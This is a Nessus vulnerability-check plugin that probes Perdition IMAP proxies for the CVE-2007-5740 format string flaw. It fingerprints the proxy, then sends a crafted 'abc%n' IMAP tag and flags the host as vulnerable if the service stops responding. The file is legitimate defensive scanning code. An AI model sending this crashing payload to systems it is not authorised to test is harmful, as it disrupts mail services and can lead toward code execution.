#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(27598);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-5740");
  script_bugtraq_id(26270);

  script_name(english:"Perdition IMAP Tag Format String Vulnerability");
  script_summary(english:"Sends a bogus IMAP tag");

  desc = "
Synopsis :

The remote IMAP server is affected by a format string vulnerability. 

Description :

The remote IMAP service is actually a Perdition IMAP proxy. 

The version of Perdition installed on the remote host appears to be
affected by a format string vulnerability in which it copies the IMAP
tag into a character buffer without first validating it and then
passes it to 'vsnprintf()' as a format string.  An unauthenticated
remote attacker may be able to leverage this issue to execute
arbitrary code on the remote host subject to the permissions under
which the proxy runs, by default 'nobody'. 

Note that exploiting this to actually execute code may be difficult
due to OS and compiler security features. 

See also :

http://www.securityfocus.com/archive/1/483034

Solution :

Upgrade to Perdition version 1.17.1 or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("find_service2.nasl");
  script_require_ports("Services/imap", 143);

  exit(0);
}


port = get_kb_item("Services/imap");
if (!port) port = 143;
if (!get_port_state(port)) exit(0);


# Establish a connection and read the banner.
soc = open_sock_tcp(port);
if (!soc) exit(0);

s = recv_line(socket:soc, length:1024);
if (!strlen(s))
{
  close(soc);
  exit(0);
}


# Send an invalid command to make sure it's Perdition.
c = SCRIPT_NAME;
send(socket:soc, data:string(c, "\r\n"));
s = recv_line(socket:soc, length:1024);
if (!strlen(s))
{
  close(soc);
  exit(0);
}

s = chomp(s);
if (string(c, " BAD Missing command, mate") == s)
{
  # Check for the vulnerability.
  c = raw_string("abc%n", 0x00);
  send(socket:soc, data:string(c, "\r\n"));
  s = recv_line(socket:soc, length:1024);
  if (!strlen(s))
  {
    security_hole(port);
    exit(0);
  }
}


# Logout.
c = string("a1 LOGOUT");
send(socket:soc, data:string(c, "\r\n"));
s = recv_line(socket:soc, length:1024);
close(soc);
